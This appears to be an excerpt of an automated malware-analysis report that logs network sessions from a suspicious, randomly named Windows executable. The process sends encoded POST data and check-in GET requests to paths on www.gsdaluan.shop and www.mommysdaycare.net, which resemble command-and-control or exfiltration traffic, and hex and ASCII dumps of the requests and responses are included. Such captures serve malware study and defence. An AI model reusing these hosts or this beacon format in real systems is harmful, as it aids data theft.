                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 72 61 6e 73 65 6c 76 61 2e 63 6f 6d 2f 65 64 69 34 2f 3f 34 64 56 34 33 74 41 3d 4e 55 57 4e 30 68 33 33 43 31 59 79 6f 6f 6a 2f 4e 71 6d 35 54 4b 6e 44 76 46 41 66 50 73 54 6c 75 2f 78 58 6f 6f 36 47 54 61 43 2f 39 35 38 2f 72 6d 4e 32 31 6c 4a 53 62 70 33 33 77 5a 30 55 74 78 73 75 52 34 32 46 4e 6a 65 76 43 42 5a 4d 4d 73 4e 4a 45 4a 54 38 52 6f 74 44 71 66 56 33 64 47 36 39 68 36 54 4b 4a 6b 34 72 36 46 5a 66 33 4a 54 49 6f 74 42 38 74 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.transelva.com/edi4/?4dV43tA=NUWN0h33C1Yyooj/Nqm5TKnDvFAfPsTlu/xXoo6GTaC/958/rmN21lJSbp33wZ0UtxsuR42FNjevCBZMMsNJEJT8RotDqfV3dG69h6TKJk4r6FZf3JTIotB8t00dC+KIgA==&amp;3hkl=slNhbLXpBjO8vl">here</a>.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              21192.168.2.549751192.207.62.21803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:17:40.379960060 CEST782OUTPOST /8urb/ HTTP/1.1
                                              Host: www.gsdaluan.shop
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.gsdaluan.shop
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 208
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.gsdaluan.shop/8urb/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Raw: 34 64 56 34 33 74 41 3d 7a 55 7a 37 59 51 54 73 4a 6b 6d 4d 4d 79 55 2f 47 47 4f 61 64 76 67 78 37 31 30 7a 43 6f 68 32 36 79 44 50 4e 64 53 39 4d 37 74 74 4c 78 72 46 4e 56 78 6b 6f 51 62 69 35 74 48 56 30 64 30 45 44 4e 4f 2b 62 32 79 57 36 72 30 7a 36 51 44 58 39 47 58 64 35 63 4e 35 51 42 47 7a 64 74 31 43 4f 69 54 55 36 77 73 77 6c 41 36 50 47 4f 50 69 69 70 72 74 2b 42 5a 6e 38 54 33 43 44 45 4d 69 4b 48 57 64 47 2b 44 2b 6e 56 41 4c 66 59 6c 4d 6e 74 68 4e 4d 6a 70 61 78 6f 7a 50 35 62 43 7a 48 4b 66 43 51 78 54 59 4a 43 48 6b 79 51 54 35 59 4b 64 32 6a 54 73 47 65 4f 71 50 73 75 51 5a 43 77 35 56 70 31 63 3d
                                              Data Ascii: 4dV43tA=zUz7YQTsJkmMMyU/GGOadvgx710zCoh26yDPNdS9M7ttLxrFNVxkoQbi5tHV0d0EDNO+b2yW6r0z6QDX9GXd5cN5QBGzdt1COiTU6wswlA6PGOPiiprt+BZn8T3CDEMiKHWdG+D+nVALfYlMnthNMjpaxozP5bCzHKfCQxTYJCHkyQT5YKd2jTsGeOqPsuQZCw5Vp1c=
                                              Jul 1, 2024 16:17:40.961719990 CEST1195INHTTP/1.1 403 Forbidden
                                              Server: nginx
                                              Date: Mon, 01 Jul 2024 14:17:40 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Cache-Control: no-cache
                                              Content-Encoding: gzip
                                              Data Raw: 33 63 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 5d 6f 13 47 14 7d 8e 7f c5 74 a3 0a 1b c5 3b 6b c7 b8 61 bd b6 44 51 2a 21 52 b5 52 53 f1 80 aa 6a bc 3b eb 1d b2 de d9 ec 8e f3 51 cb 12 49 4b 0a 02 9a a0 12 35 1f 95 68 43 9b 96 46 32 85 54 82 92 18 fe 4c 66 ed 3c e5 2f 74 f6 c3 c6 21 d4 7e d8 9d bb f7 9e 73 cf 9d 33 a3 7d 60 50 9d 2d ba 18 58 ac 6e 57 52 5a ff 81 91 21 56 75 cc 10 d0 2d e4 f9 98 95 a5 06 33 b3 13 92 08 33 c2 6c 5c e9 76 1e 74 f7 36 8f 37 9e 77 97 f6 f8 ce a6 06 e3 70 4a f3 d9 a2 f8 9c 3a df ac 23 af 46 1c 55 29 b9 c8 30 88 53 13 6f 3a b5 a9 a7 8e 16 0a 85 56 aa 4a 8d c5 a6 49 1d 96 f5 c9 37 58 cd 15 dc 85 52 b4 34 51 9d d8 8b aa c4 db 77 8f 3a 3f 4a ad 94 5c 47 c4 69 ce 13 83 59 6a 51 51 44 5e 02 9d 53 3e 04 a8 c1 68 49 e4 44 f4 cd 2a d2 67 6a 1e 6d 38 86 0a 46 f3 0a ba 30 8e 12 52 30 6a 9a 66 4c 10 f1 81 5c 51 00 59 98 d4 2c a6 82 42 88 6a 13 07 67 4f 45 92 ce b3 36 36 45 52 3e 4c 12 54 ba e8 12 3b 6c 88 2c 9b 08 33 c7 cd 8f cc 8b 25 90 80 e4 27 c2 8a 2a f5 0c ec a9 39 77 01 18 [TRUNCATED]
                                              Data Ascii: 3c1uT]oG}t;kaDQ*!RRSj;QIK5hCF2TLf</t!~s3}`P-XnWRZ!Vu-33l\vt67wpJ:#FU)0So:VJI7XR4Qw:?J\GiYjQQD^S>hID*gjm8F0R0jfL\QY,BjgOE66ER>LT;l,3%'*9wFqZ&%qnJu)TSP%4R(d8@e1|I}0MH CVL0A>/RnllxJ!4huD,M]gSS%{zY7f9FQN/Ux&\L]CXIUF''kW1}=Vf'e%5d6OT0twSD#e9,El~s>_`{^|_k+Fiww.i}=/U# .ZlvMWn-?;|"AEE&CrBz|es''lb}|}Li>Wox{Tuti8\WxcCIKGg:Ls(! +_?g1f;c'56XD?7lcsc_cy:dfY_w"fit$1+s5S2a|C10


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              22192.168.2.549752192.207.62.21803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:17:42.922319889 CEST802OUTPOST /8urb/ HTTP/1.1
                                              Host: www.gsdaluan.shop
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.gsdaluan.shop
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 228
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.gsdaluan.shop/8urb/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Raw: 34 64 56 34 33 74 41 3d 7a 55 7a 37 59 51 54 73 4a 6b 6d 4d 4d 52 4d 2f 4b 46 57 61 49 2f 67 79 6e 46 30 7a 49 49 68 79 36 31 4c 50 4e 5a 69 74 4e 4e 39 74 4c 51 62 46 66 6b 78 6b 72 51 62 69 74 39 48 4d 77 64 30 66 44 4e 44 64 62 33 4f 57 36 72 67 7a 36 55 50 58 39 52 72 65 34 4d 4e 37 59 68 47 78 44 64 31 43 4f 69 54 55 36 77 34 4b 6c 42 53 50 46 39 58 69 69 49 71 37 79 68 5a 6b 37 54 33 43 48 45 4d 63 4b 48 57 7a 47 2f 76 55 6e 58 34 4c 66 63 68 4d 6e 38 68 4f 46 6a 70 55 31 6f 79 43 35 6f 37 52 49 71 50 52 56 7a 47 35 62 77 44 4d 7a 6d 2b 54 43 6f 56 65 77 7a 41 2b 4f 64 69 34 39 65 78 77 59 54 70 6c 33 69 4c 4e 77 36 34 6a 6f 37 72 58 71 47 41 57 35 67 62 66 59 49 61 58
                                              Data Ascii: 4dV43tA=zUz7YQTsJkmMMRM/KFWaI/gynF0zIIhy61LPNZitNN9tLQbFfkxkrQbit9HMwd0fDNDdb3OW6rgz6UPX9Rre4MN7YhGxDd1COiTU6w4KlBSPF9XiiIq7yhZk7T3CHEMcKHWzG/vUnX4LfchMn8hOFjpU1oyC5o7RIqPRVzG5bwDMzm+TCoVewzA+Odi49exwYTpl3iLNw64jo7rXqGAW5gbfYIaX
                                              Jul 1, 2024 16:17:43.529786110 CEST1195INHTTP/1.1 403 Forbidden
                                              Server: nginx
                                              Date: Mon, 01 Jul 2024 14:17:43 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Cache-Control: no-cache
                                              Content-Encoding: gzip
                                              Data Raw: 33 63 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 5d 6f 13 47 14 7d 8e 7f c5 74 a3 0a 1b c5 3b 6b c7 b8 61 bd b6 44 51 2a 21 52 b5 52 53 f1 80 aa 6a bc 3b eb 1d b2 de d9 ec 8e f3 51 cb 12 49 4b 0a 02 9a a0 12 35 1f 95 68 43 9b 96 46 32 85 54 82 92 18 fe 4c 66 ed 3c e5 2f 74 f6 c3 c6 21 d4 7e d8 9d bb f7 9e 73 cf 9d 33 a3 7d 60 50 9d 2d ba 18 58 ac 6e 57 52 5a ff 81 91 21 56 75 cc 10 d0 2d e4 f9 98 95 a5 06 33 b3 13 92 08 33 c2 6c 5c e9 76 1e 74 f7 36 8f 37 9e 77 97 f6 f8 ce a6 06 e3 70 4a f3 d9 a2 f8 9c 3a df ac 23 af 46 1c 55 29 b9 c8 30 88 53 13 6f 3a b5 a9 a7 8e 16 0a 85 56 aa 4a 8d c5 a6 49 1d 96 f5 c9 37 58 cd 15 dc 85 52 b4 34 51 9d d8 8b aa c4 db 77 8f 3a 3f 4a ad 94 5c 47 c4 69 ce 13 83 59 6a 51 51 44 5e 02 9d 53 3e 04 a8 c1 68 49 e4 44 f4 cd 2a d2 67 6a 1e 6d 38 86 0a 46 f3 0a ba 30 8e 12 52 30 6a 9a 66 4c 10 f1 81 5c 51 00 59 98 d4 2c a6 82 42 88 6a 13 07 67 4f 45 92 ce b3 36 36 45 52 3e 4c 12 54 ba e8 12 3b 6c 88 2c 9b 08 33 c7 cd 8f cc 8b 25 90 80 e4 27 c2 8a 2a f5 0c ec a9 39 77 01 18 [TRUNCATED]
                                              Data Ascii: 3c1uT]oG}t;kaDQ*!RRSj;QIK5hCF2TLf</t!~s3}`P-XnWRZ!Vu-33l\vt67wpJ:#FU)0So:VJI7XR4Qw:?J\GiYjQQD^S>hID*gjm8F0R0jfL\QY,BjgOE66ER>LT;l,3%'*9wFqZ&%qnJu)TSP%4R(d8@e1|I}0MH CVL0A>/RnllxJ!4huD,M]gSS%{zY7f9FQN/Ux&\L]CXIUF''kW1}=Vf'e%5d6OT0twSD#e9,El~s>_`{^|_k+Fiww.i}=/U# .ZlvMWn-?;|"AEE&CrBz|es''lb}|}Li>Wox{Tuti8\WxcCIKGg:Ls(! +_?g1f;c'56XD?7lcsc_cy:dfY_w"fit$1+s5S2a|C10


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              23192.168.2.549753192.207.62.21803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:17:45.466121912 CEST1819OUTPOST /8urb/ HTTP/1.1
                                              Host: www.gsdaluan.shop
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.gsdaluan.shop
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 1244
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.gsdaluan.shop/8urb/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Raw: 34 64 56 34 33 74 41 3d 7a 55 7a 37 59 51 54 73 4a 6b 6d 4d 4d 52 4d 2f 4b 46 57 61 49 2f 67 79 6e 46 30 7a 49 49 68 79 36 31 4c 50 4e 5a 69 74 4e 4e 31 74 4c 43 6a 46 4f 33 70 6b 71 51 62 69 75 39 48 52 77 64 31 50 44 4e 62 42 62 33 43 67 36 75 6b 7a 37 78 54 58 73 56 2f 65 79 4d 4e 37 55 42 47 77 64 74 31 79 4f 6d 4f 64 36 77 6f 4b 6c 42 53 50 46 38 6e 69 67 5a 71 37 30 68 5a 6e 38 54 33 77 44 45 4d 6e 4b 48 65 46 47 2f 62 75 6d 6d 59 4c 63 38 78 4d 68 4f 35 4f 4b 6a 6f 79 34 49 7a 52 35 70 48 6e 49 71 54 6a 56 79 79 66 62 79 54 4d 79 33 2b 4a 65 4b 4a 53 6b 67 64 65 42 73 69 53 72 5a 64 79 62 67 4d 58 30 42 62 44 78 4a 4d 72 6d 66 76 57 72 48 52 4e 76 55 76 79 49 50 54 38 47 77 72 4f 79 53 79 43 52 6d 55 6e 47 6d 70 64 6c 75 4a 77 72 64 4c 59 6d 49 68 71 67 67 4b 4d 77 55 41 77 66 53 6b 78 46 7a 2f 4c 36 6f 7a 61 4c 30 34 7a 59 37 6a 76 31 76 4f 43 7a 57 75 4b 45 49 4f 45 63 6c 6e 75 78 34 6d 34 51 64 61 2f 50 53 49 77 67 34 46 73 65 62 49 4e 78 70 57 61 6b 59 78 31 38 66 5a 78 6b 5a 38 43 43 57 [TRUNCATED]
                                              Data Ascii: 4dV43tA=zUz7YQTsJkmMMRM/KFWaI/gynF0zIIhy61LPNZitNN1tLCjFO3pkqQbiu9HRwd1PDNbBb3Cg6ukz7xTXsV/eyMN7UBGwdt1yOmOd6woKlBSPF8nigZq70hZn8T3wDEMnKHeFG/bummYLc8xMhO5OKjoy4IzR5pHnIqTjVyyfbyTMy3+JeKJSkgdeBsiSrZdybgMX0BbDxJMrmfvWrHRNvUvyIPT8GwrOySyCRmUnGmpdluJwrdLYmIhqggKMwUAwfSkxFz/L6ozaL04zY7jv1vOCzWuKEIOEclnux4m4Qda/PSIwg4FsebINxpWakYx18fZxkZ8CCW1pHeeGPYTV4vyfJEgplPPZ+659vh5fq0exCEWEv03jR7eZv7AO4miRvgBe1H2lSkcnTxUdnSHkk1lMmO9B3bDm3uXYrsg4SbLffd6YE9EVe2GjRHzCFvZGUEDn3DAoy6QT+FQM5vH/j2/+2SjDeVwRRz2Lgrmpi1XI0puHD7oz5DivS1CpIRAmPi5eMuoC3wct7xQ6E+IshslCreWzVOuplb8dAxY60QMQvWxiEIiVqvQJy6zRxgKIFYa/uFhOootvwv/mEd7eJKQSaQXB4FvtBRbsr9gY2FWIoHqMaEG7eQVQQikS5eZbMLsQKjiAPpGsv3orf6zixXuAzd9JuXwcsSzOZGoPZGH3znzmv/qD+X9sfSg44SMFTXqNs/xcKBaTPamTlT+gaMKEYU802sBJt1aLod6sJlwJlD50U7TSaB0FM5WRSVlKencRrjGmwKdM3pIPapXfaX510o+1tFt1jJ7XpwSSq176d2r5Erb+eiJu0mmWaeFOZhMvHe7I7Mo8rpUMGjDNuQTwXwR+aOzoy0pO38PPiN+xcfDe7YHtXwXGYL35D31ZVXm7RhU4lzCWfag5SHepbojfwIA8IQr0KfvfIFJVX98CtdF4KjqjTiJbJshRyXSdNkGY1d6NiIXJSP5Jd5271y5fvuevZa6EYqcFO/nEyC8H [TRUNCATED]
                                              Jul 1, 2024 16:17:46.124095917 CEST1195INHTTP/1.1 403 Forbidden
                                              Server: nginx
                                              Date: Mon, 01 Jul 2024 14:17:46 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Cache-Control: no-cache
                                              Content-Encoding: gzip
                                              Data Raw: 33 63 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 5d 6f 13 47 14 7d 8e 7f c5 74 a3 0a 1b c5 3b 6b c7 b8 61 bd b6 44 51 2a 21 52 b5 52 53 f1 80 aa 6a bc 3b eb 1d b2 de d9 ec 8e f3 51 cb 12 49 4b 0a 02 9a a0 12 35 1f 95 68 43 9b 96 46 32 85 54 82 92 18 fe 4c 66 ed 3c e5 2f 74 f6 c3 c6 21 d4 7e d8 9d bb f7 9e 73 cf 9d 33 a3 7d 60 50 9d 2d ba 18 58 ac 6e 57 52 5a ff 81 91 21 56 75 cc 10 d0 2d e4 f9 98 95 a5 06 33 b3 13 92 08 33 c2 6c 5c e9 76 1e 74 f7 36 8f 37 9e 77 97 f6 f8 ce a6 06 e3 70 4a f3 d9 a2 f8 9c 3a df ac 23 af 46 1c 55 29 b9 c8 30 88 53 13 6f 3a b5 a9 a7 8e 16 0a 85 56 aa 4a 8d c5 a6 49 1d 96 f5 c9 37 58 cd 15 dc 85 52 b4 34 51 9d d8 8b aa c4 db 77 8f 3a 3f 4a ad 94 5c 47 c4 69 ce 13 83 59 6a 51 51 44 5e 02 9d 53 3e 04 a8 c1 68 49 e4 44 f4 cd 2a d2 67 6a 1e 6d 38 86 0a 46 f3 0a ba 30 8e 12 52 30 6a 9a 66 4c 10 f1 81 5c 51 00 59 98 d4 2c a6 82 42 88 6a 13 07 67 4f 45 92 ce b3 36 36 45 52 3e 4c 12 54 ba e8 12 3b 6c 88 2c 9b 08 33 c7 cd 8f cc 8b 25 90 80 e4 27 c2 8a 2a f5 0c ec a9 39 77 01 18 [TRUNCATED]
                                              Data Ascii: 3c1uT]oG}t;kaDQ*!RRSj;QIK5hCF2TLf</t!~s3}`P-XnWRZ!Vu-33l\vt67wpJ:#FU)0So:VJI7XR4Qw:?J\GiYjQQD^S>hID*gjm8F0R0jfL\QY,BjgOE66ER>LT;l,3%'*9wFqZ&%qnJu)TSP%4R(d8@e1|I}0MH CVL0A>/RnllxJ!4huD,M]gSS%{zY7f9FQN/Ux&\L]CXIUF''kW1}=Vf'e%5d6OT0twSD#e9,El~s>_`{^|_k+Fiww.i}=/U# .ZlvMWn-?;|"AEE&CrBz|es''lb}|}Li>Wox{Tuti8\WxcCIKGg:Ls(! +_?g1f;c'56XD?7lcsc_cy:dfY_w"fit$1+s5S2a|C10


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              24192.168.2.549754192.207.62.21803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:17:47.997961044 CEST528OUTGET /8urb/?3hkl=slNhbLXpBjO8vl&4dV43tA=+Wbbbk7eLFmMNhAmT0HXUc8arE4mAIhp5z7AS+/8DqhgdhWyAH0zoQfcqO3QhsAMO97HQEWUjr1A2ySQn1zg0/55KGrPENVTP1yAkCUjuBmNS/fntZ3fyi496lnRN2tFRA== HTTP/1.1
                                              Host: www.gsdaluan.shop
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Jul 1, 2024 16:17:48.596379042 CEST1236INHTTP/1.1 403 Forbidden
                                              Server: nginx
                                              Date: Mon, 01 Jul 2024 14:17:48 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Cache-Control: no-cache
                                              Data Raw: 36 31 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e e7 bd 91 e7 ab 99 e9 98 b2 e7 81 ab e5 a2 99 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 63 6f 6c 6f 72 3a 23 34 34 34 7d 0a 62 6f 64 79 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 e5 ae 8b e4 bd 93 22 7d 0a 2e 6d 61 69 6e 7b 77 69 64 74 68 3a 36 30 30 70 78 3b 6d 61 72 67 69 6e 3a 31 30 25 20 61 75 74 6f 3b 7d 0a 2e 74 69 74 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 30 61 35 33 61 3b 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 68 65 69 67 68 74 3a 20 34 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 34 30 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 30 70 78 3b 7d 0a 2e 63 6f 6e 74 65 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c [TRUNCATED]
                                              Data Ascii: 613<!doctype html><html><head><meta charset="utf-8"><title></title><style>*{margin:0;padding:0;color:#444}body{font-size:14px;font-family:""}.main{width:600px;margin:10% auto;}.title{background: #20a53a;color: #fff;font-size: 16px;height: 40px;line-height: 40px;padding-left: 20px;}.content{background-color:#f3f7f9; height:280px;border:1px dashed #c6d9b6;padding:20px}.t1{border-bottom: 1px dashed #c6d9b6;color: #ff4000;font-weight: bold; margin: 0 0 20px; padding-bottom: 18px;}.t2{margin-bottom:8px; font-weight:bold}ol{margin:0 0 20px 22px;padding:0;}ol li{line-height:30px}</style></head><script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"KPvSogiWixBEEhWI",ck:"KPvSogiWixBEEhWI"})</script><body><div class="main"><div class="title"></div><div class="content"><p class="t1"></p><p class="t2"> [TRUNCATED]
                                              Jul 1, 2024 16:17:48.596417904 CEST529INData Raw: 90 e4 ba a4 e7 9a 84 e5 86 85 e5 ae b9 e5 8c 85 e5 90 ab e5 8d b1 e9 99 a9 e7 9a 84 e6 94 bb e5 87 bb e8 af b7 e6 b1 82 3c 2f 6c 69 3e 0a 09 09 09 3c 2f 6f 6c 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 74 32 22 3e e5 a6 82 e4 bd 95 e8 a7 a3 e5
                                              Data Ascii: </li></ol><p class="t2"></p><ol><li></li><li></li><li>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              25192.168.2.549755199.59.243.226803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:17:54.095976114 CEST794OUTPOST /k4dg/ HTTP/1.1
                                              Host: www.mommysdaycare.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.mommysdaycare.net
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 208
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.mommysdaycare.net/k4dg/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Raw: 34 64 56 34 33 74 41 3d 71 78 51 6c 45 2b 6c 6f 2f 6b 54 6f 65 74 73 41 39 62 73 62 6a 45 4d 73 56 5a 77 62 39 71 67 46 34 4a 4f 6f 35 37 42 43 5a 50 42 32 33 35 46 39 66 55 6b 48 36 78 47 33 74 38 74 41 30 70 4e 68 47 4b 53 61 6b 73 5a 6d 50 76 6a 39 79 31 57 4a 72 34 52 42 39 71 79 78 68 4b 69 49 67 33 31 31 42 76 6f 56 31 6b 52 43 32 6d 6f 45 4e 67 46 78 48 4e 6c 5a 4d 76 5a 61 5a 53 5a 45 46 5a 51 56 61 36 7a 7a 69 54 62 56 65 47 47 7a 39 58 39 6c 66 6f 64 41 73 69 44 43 77 47 51 33 50 59 50 4c 73 69 6c 54 42 53 70 5a 4b 44 53 7a 79 62 75 58 45 79 42 70 57 52 67 61 59 34 34 67 77 72 30 4c 4f 37 67 2b 6d 62 6f 3d
                                              Data Ascii: 4dV43tA=qxQlE+lo/kToetsA9bsbjEMsVZwb9qgF4JOo57BCZPB235F9fUkH6xG3t8tA0pNhGKSaksZmPvj9y1WJr4RB9qyxhKiIg311BvoV1kRC2moENgFxHNlZMvZaZSZEFZQVa6zziTbVeGGz9X9lfodAsiDCwGQ3PYPLsilTBSpZKDSzybuXEyBpWRgaY44gwr0LO7g+mbo=
                                              Jul 1, 2024 16:17:54.566551924 CEST1236INHTTP/1.1 200 OK
                                              date: Mon, 01 Jul 2024 14:17:54 GMT
                                              content-type: text/html; charset=utf-8
                                              content-length: 1134
                                              x-request-id: 924ebff8-6498-4b79-87f9-c8be642bfed3
                                              cache-control: no-store, max-age=0
                                              accept-ch: sec-ch-prefers-color-scheme
                                              critical-ch: sec-ch-prefers-color-scheme
                                              vary: sec-ch-prefers-color-scheme
                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_yS6Hx1Qg9xx5kmEUaYHwQfeyvDLHfqkCmBNz2/vxHE4NPGS2vcFUpSiBHRAHFgFwHzbWtObo93Zjpn7eZXAkDQ==
                                              set-cookie: parking_session=924ebff8-6498-4b79-87f9-c8be642bfed3; expires=Mon, 01 Jul 2024 14:32:54 GMT; path=/
                                              connection: close
                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 79 53 36 48 78 31 51 67 39 78 78 35 6b 6d 45 55 61 59 48 77 51 66 65 79 76 44 4c 48 66 71 6b 43 6d 42 4e 7a 32 2f 76 78 48 45 34 4e 50 47 53 32 76 63 46 55 70 53 69 42 48 52 41 48 46 67 46 77 48 7a 62 57 74 4f 62 6f 39 33 5a 6a 70 6e 37 65 5a 58 41 6b 44 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
